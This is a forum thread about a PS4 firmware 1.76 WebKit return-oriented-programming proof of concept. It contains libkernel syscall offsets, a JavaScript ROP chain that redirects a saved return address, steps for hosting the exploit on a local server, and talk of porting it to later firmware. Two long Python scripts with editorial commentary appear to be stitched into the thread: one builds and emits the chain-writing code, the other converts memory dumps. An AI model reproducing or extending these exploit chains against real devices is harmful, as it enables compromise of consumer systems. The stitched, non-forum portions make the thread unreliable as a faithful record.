anhell28 wrote: I really do want the new features coming with FW 2.0, but I will most likely purchase another PS4 to keep one vulnerable and one legit for my online gaming.

I am aware of two different ways we can implement this exploit post-2.0. As for the 2.0 update, we should be able to get this working as is with some minor changes. There is another trick I am aware of that will allow people to implement this on any firmware version, but it is possible that will be fixed eventually as well. No need to buy another console just yet.
I was thinking that the Xbox One would be hacked first and then a while later the PS4.....
Glad I purchased a PS4 instead of an XB1, even though I always had an Xbox 360 in my home, which I have JTAG'd and flashed the drive with LT3.0 for online.
PS4 1.76 Webkit ROP POC
Forum rules
Forum rule Nº 15 is strictly enforced in this subforum.
Re: PS4 1.76 Webkit ROP POC
Re: PS4 1.76 Webkit ROP POC
D3NN15 wrote: Since this has been rumored to be patched in 2.0, should I update, or should I wait or get another PS4 and keep it on 1.76 for a couple of months while devs work on an exploit? If there are more vulnerabilities in 2.0+, is it worth updating?

HarmfulMushroom wrote: It's not a rumor, it's a fact; it will be patched at 2.00. And I'd say it's a safe assumption that it's going to be longer than just a couple of months before anything big is found, so it's your call on what you want to do.

Berlin wrote: I bet you $100 I can get this running on 2.0... I'd say it's fairly safe to update, to be honest. Make of that what you will and update at your own risk; I'm 99% sure we will be able to port this to 2.0 one way or another.

Are you going to say WebKit-based apps?
Re: PS4 1.76 Webkit ROP POC
Congratulations and thanks to Proxima and Nas_plugi.
I can confirm it works!!! I am also totally astonished by your "make_rop.py".
Re: PS4 1.76 Webkit ROP POC
Quote: Are you going to say WebKit-based apps?

That's not what I have in mind, although it's a good guess, I suppose.
I don't know if you can get this working on WebKit-based media apps (Netflix, etc.), as I haven't really looked into that too much. I don't believe you can, for a couple of different reasons.
Using this WebKit exploit on higher firmware will be slightly more difficult, as you will have to employ several different methods to get access to a vulnerable WebKit revision. Without revealing specifics, there are a couple of clever ways you can find to get this working sans the regular browser.
With that being said, I'd bet the farm that we get this to work on 2.0.
Re: PS4 1.76 Webkit ROP POC
Hello,
Please, can you help me with how to edit the source code so it works on my own server... the dump upload is not working for me.
Thanks in advance.
Re: PS4 1.76 Webkit ROP POC
Try xampp if you're having problems
Re: PS4 1.76 Webkit ROP POC
Thanks for the reply... the problem is that I don't have a PS4, but many users of my forum have a PS4 system, so I uploaded the files at http://ps3haxcz.com/ps4/. The WebKit part proceeds correctly, but the upload to the server failed.
Re: PS4 1.76 Webkit ROP POC
@varinek
Because dumps are personal, you should tell your members:
1-Install uWAmp http://www.uwamp.com
2-Copy the nas POC into www
3-PS4 browser -> local IP, let's go
...
@Nas I found some useful syscalls in libkernel:
sys_exit = 0xDD50 # + libkernel_base
munmap = 0xC0B0 # + libkernel_base
execve = 0xBFF0 # + libkernel_base
But, for example, when I try to call sys_exit, I get a memory error.
Place these files into the last_dump directory and exec python dir2bin.py:
dump-0x48f8c000-0
dump-0x48f8c000-1
dump-0x82f7e4000-0
dump-0x82f7e4000-1
dump-0x82f7e4000-2
dump-0x82f7e4000-3
make_rop.py code:
sys_exit = 0xDD50 # + libkernel_base
func_1("libkernel_base", sys_exit, 0)   # POC helper: call libkernel_base + sys_exit with argument 0
print_rop()
sp_takeover()  # ?
javascript rop code:
setU64to(chain_addr + 0, wk_base + 1277117);          // slot 0: gadget inside WebKit
setU64to(chain_addr + 8, 0);                          // slot 1: immediate 0
setU64to(chain_addr + 16, libkernel_base + 56656);    // slot 2: libkernel_base + 0xDD50 (sys_exit offset above)
// point a return address of the stack to our chain
setU64to(stack_base + return_va + 8, chain_addr);
setU64to(stack_base + return_va, wk_base + 392117);
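The post above shows a symbolic chain (a WebKit gadget, an immediate, a libkernel function) and the JavaScript that writes it and repoints a saved return address at it. The script below is an added example, not the thread's make_rop.py, that reproduces that workflow in a small, self-contained form: it resolves (base, offset) entries to concrete 64-bit slots for inspection, packs them little-endian as they would sit in memory, and emits the setU64to() lines in exactly the form posted. The libkernel offsets are the ones quoted in the post (0xDD50 is 56656, the value in the posted chain); the function names resolve/build_chain/emit_js, the demo base addresses, and the reading of the wk_base + 392117 gadget as a stack pivot are assumptions of this example, not something the thread states.

```python
import struct

# libkernel offsets quoted in the post above (relative to libkernel_base).
LIBKERNEL_OFFSETS = {
    "sys_exit": 0xDD50,   # 56656 decimal, the value used in the posted JS chain
    "munmap": 0xC0B0,
    "execve": 0xBFF0,
}

MASK64 = (1 << 64) - 1


def resolve(entry, bases):
    """Concrete 64-bit value of one chain slot.

    An entry is either an int (an immediate such as an argument) or a
    (base_name, offset) pair resolved against runtime base addresses,
    which the JavaScript side only knows after its leak.
    """
    if isinstance(entry, int):
        return entry & MASK64
    base_name, offset = entry
    return (bases[base_name] + offset) & MASK64


def build_chain(entries, bases):
    """Return [(byte offset within the chain, value), ...], one u64 per slot."""
    return [(8 * i, resolve(e, bases)) for i, e in enumerate(entries)]


def chain_bytes(chain):
    """The chain as it sits in memory: consecutive little-endian u64s."""
    return b"".join(struct.pack("<Q", value) for _, value in chain)


def symbolic(entry):
    """JavaScript expression for one slot, e.g. 'wk_base + 1277117'."""
    if isinstance(entry, int):
        return str(entry)
    base_name, offset = entry
    return f"{base_name} + {offset}"


def emit_js(entries, pivot_gadget, chain_var="chain_addr",
            stack_var="stack_base", ret_var="return_va"):
    """Emit the setU64to() calls in the form used by the posted JavaScript.

    Chain slots are written first. Then the saved return address at
    stack_base + return_va is replaced by the pivot gadget and the slot
    above it receives the chain address; the assumption (not stated in
    the thread) is that the pivot gadget moves that value into rsp so
    execution continues in the chain.
    """
    lines = [f"setU64to({chain_var} + {8 * i}, {symbolic(e)});"
             for i, e in enumerate(entries)]
    lines.append("// point a return address of the stack to our chain")
    lines.append(f"setU64to({stack_var} + {ret_var} + 8, {chain_var});")
    lines.append(f"setU64to({stack_var} + {ret_var}, {symbolic(pivot_gadget)});")
    return "\n".join(lines)


# The chain from the post: a WebKit gadget, an immediate 0, then sys_exit.
POSTED_CHAIN = [("wk_base", 1277117), 0,
                ("libkernel_base", LIBKERNEL_OFFSETS["sys_exit"])]
POSTED_PIVOT = ("wk_base", 392117)

if __name__ == "__main__":
    print(emit_js(POSTED_CHAIN, POSTED_PIVOT))
    # Constructed base addresses, only to show the concrete memory layout.
    demo_bases = {"wk_base": 0x80_0000_0000, "libkernel_base": 0x81_0000_0000}
    print(chain_bytes(build_chain(POSTED_CHAIN, demo_bases)).hex())
```

Running the script prints the six setU64to() lines from the post verbatim, which is a quick way to confirm a hand-edited chain before pasting it into the exploit page; the hex dump shows the 24-byte slot layout that the three writes produce.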
Re: PS4 1.76 Webkit ROP POC
thank you. I'll try it
Re: PS4 1.76 Webkit ROP POC
Hi all,
I used Varinek's links and downloaded the dumps from there.
The dumps had to be processed, as leading zeroes were missing and the order of the bytes had to be swapped.
I'd like to share the resulting binaries with you guys.
Cheers,
karl
Attachment: dump_binaries.rar (18.63 KiB), downloaded 233 times
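Karl's post says the text dumps needed two fixes before they became usable binaries: missing leading zeros and swapped byte order. The converter below is an added example (not the thread's dir2bin.py and not karl's tool) that performs both steps and also orders the dump-<base>-<n> chunk files listed earlier in the thread. It assumes a dump format the thread does not spell out: one 32-bit word per line, printed by JavaScript's Number.toString(16) (hence no leading zeros, most-significant nibble first) from memory the console stores little-endian, and that chunk n+1 follows chunk n contiguously. The sample dump text in the block is constructed.

```python
import re
import struct

# Assumed dump format: one 32-bit word per line, as JavaScript's
# Number.toString(16) prints it (no leading zeros, most-significant nibble
# first), while the console stored the word little-endian.
WORD_BYTES = 4
HEX_DIGITS = 2 * WORD_BYTES

DUMP_NAME = re.compile(r"^dump-0x([0-9a-fA-F]+)-(\d+)$")


def word_to_bytes(token):
    """'dd50' -> b'\\x50\\xdd\\x00\\x00': pad to a full word, then byte-swap."""
    token = token.strip().lower()
    if token.startswith("0x"):
        token = token[2:]
    if not re.fullmatch(r"[0-9a-f]+", token):
        raise ValueError(f"not a hex word: {token!r}")
    if len(token) > HEX_DIGITS:
        raise ValueError(f"word wider than {WORD_BYTES} bytes: {token!r}")
    value = int(token.zfill(HEX_DIGITS), 16)   # restore the missing leading zeros
    return struct.pack("<I", value)            # emit in memory (little-endian) order


def convert_dump(text):
    """Whole text dump -> raw memory image (words in file order)."""
    return b"".join(word_to_bytes(t) for t in text.split())


def read_u32(image, offset):
    """Read back one word from the image, to check the round trip."""
    return struct.unpack_from("<I", image, offset)[0]


def order_dumps(names):
    """Group 'dump-0x<base>-<n>' files by base and sort chunks numerically.

    Returns {base_address: [file names in chunk order]}. A plain string
    sort would put '-10' before '-2', so the index is compared as an int.
    Contiguity of consecutive chunks is an assumption of this example.
    """
    groups = {}
    for name in names:
        m = DUMP_NAME.match(name)
        if not m:
            raise ValueError(f"unexpected file name: {name}")
        base, idx = int(m.group(1), 16), int(m.group(2))
        groups.setdefault(base, []).append((idx, name))
    return {base: [n for _, n in sorted(chunks)] for base, chunks in groups.items()}


# Constructed sample: the three libkernel offsets from the thread, as a
# JavaScript dumper would have printed them (no leading zeros).
SAMPLE_DUMP = "dd50\nc0b0\nbff0\n0\n"

if __name__ == "__main__":
    image = convert_dump(SAMPLE_DUMP)
    print(image.hex())                       # 50dd0000b0c00000f0bf000000000000
    print(hex(read_u32(image, 0)))           # 0xdd50
    files = ["dump-0x82f7e4000-3", "dump-0x48f8c000-1", "dump-0x82f7e4000-0",
             "dump-0x48f8c000-0", "dump-0x82f7e4000-2", "dump-0x82f7e4000-1"]
    for base, chunks in sorted(order_dumps(files).items()):
        print(hex(base), chunks)
```

If a real dump turns out to use 64-bit words instead, only WORD_BYTES and the "<I" format string change; the padding and swap logic is the same, and the read_u32 round trip is the quickest way to confirm that a known value (such as an offset you expect at a given address) lands where it should.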